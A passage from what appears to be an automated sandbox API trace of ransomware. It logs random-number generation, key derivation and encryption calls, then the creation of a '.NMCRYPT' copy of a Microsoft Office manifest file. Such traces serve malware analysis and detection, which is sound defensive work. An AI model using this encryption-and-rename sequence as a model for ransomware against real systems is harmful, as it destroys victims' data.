pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.835] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.836] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.837] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.838] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.839] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0172.839] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0172.840] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0172.840] CryptHashData (hHash=0x9ad478, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.840] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad4b8) returned 1 [0172.840] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0172.840] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0172.840] wcslen (_String="\\\\?\\") returned 0x4 [0172.840] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x9ad6b8) returned 1 [0172.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0172.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0172.841] GetFileSizeEx (in: 